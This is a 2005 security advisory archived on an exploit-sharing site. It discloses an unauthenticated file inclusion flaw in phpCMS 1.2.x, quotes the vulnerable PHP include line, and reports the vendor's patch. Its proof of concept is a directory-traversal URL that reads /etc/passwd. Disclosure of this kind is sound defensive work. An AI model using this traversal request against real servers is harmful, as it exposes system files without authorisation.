what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpCMS12x.txt

phpCMS12x.txt
Posted Jun 18, 2005
Authored by sk0L | Site sec-consult.com

phpCMS 1.2.x suffers from an arbitrary file inclusion vulnerability.

tags | exploit, arbitrary, file inclusion
SHA-256 | 04dd406024d58d3359604a12f1527b764eefa5071d43fc216473bbf1a65ecd0a
Download | Favorite | View

phpCMS12x.txt

Change Mirror Download
SEC-CONSULT Security Advisory 20050602-1
=======================================================================
                  title: Arbitrary File Inclusion in phpCMS 1.2.x
                program: phpCMS
     vulnerable version: 1.2.0, 1.2.1, 1.2.1pl1
               homepage: www.phpcms.de
                  found: 2005-05-31
                     by: sk0L / SEC-CONSULT / www.sec-consult.com
=======================================================================

vendor description:
---------------
phpCMS is a content management system, which convinces in particular by
small
system requirements, high performance and above all its flexibility.


vulnerabilty overview:
---------------
a flaw in phpCMS makes it possible to include arbitrary files on the server.
as the "include" statement is called before any session checks occur,
this vuln
can be exploited without any prior authentication.


proof of concept:
---------------

the vulnerable include call resides in class.layout_phpcms.php:

if(isset($_GET['language']) && $_GET['language'] != '') {
    include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
[...]

so you are able to do something like:

http://vu1n.com/parser/parser.php?&phpcmsaction=FILEMANAGER&language=de/../../../../../../../etc/passwd


vulnerable versions:
---------------

according to Ignatius from the phpCMS Core Team, the vulnerable code
line was introduced in phpCMS 1.2.0. older versions are not affected by
this vulnerabity.


vendor status:
---------------
vendor notified: 2005-05-31
vendor response: immediately
patch available: 2005-06-01

the vulnerabilty has been adressed in phpCMS 1.2.1pl2. additionally,
patches for the affected versions have been made available by the vendor.

http://www.phpcms.de/download/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bernhard Mueller / www.sec-consult.com /
SGT ::: dfa, tke, bfi, mei, flo, walter|bruder :::

~    ___   ___
~   |   |=|_.'   .'|   .'|   .'|=|`.     .'|
~   `.  |      .'  | .' .' .'  | |  `. .'  |
 ==== `.|=|`.  |   |=|.:   |   | |   | |   |  ======
~    ___  |  `.|   |   |'. `.  | |  .' |   |  ___
~    `._|=|___||___|   |_|   `.|=|.'   |___|=|_.
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close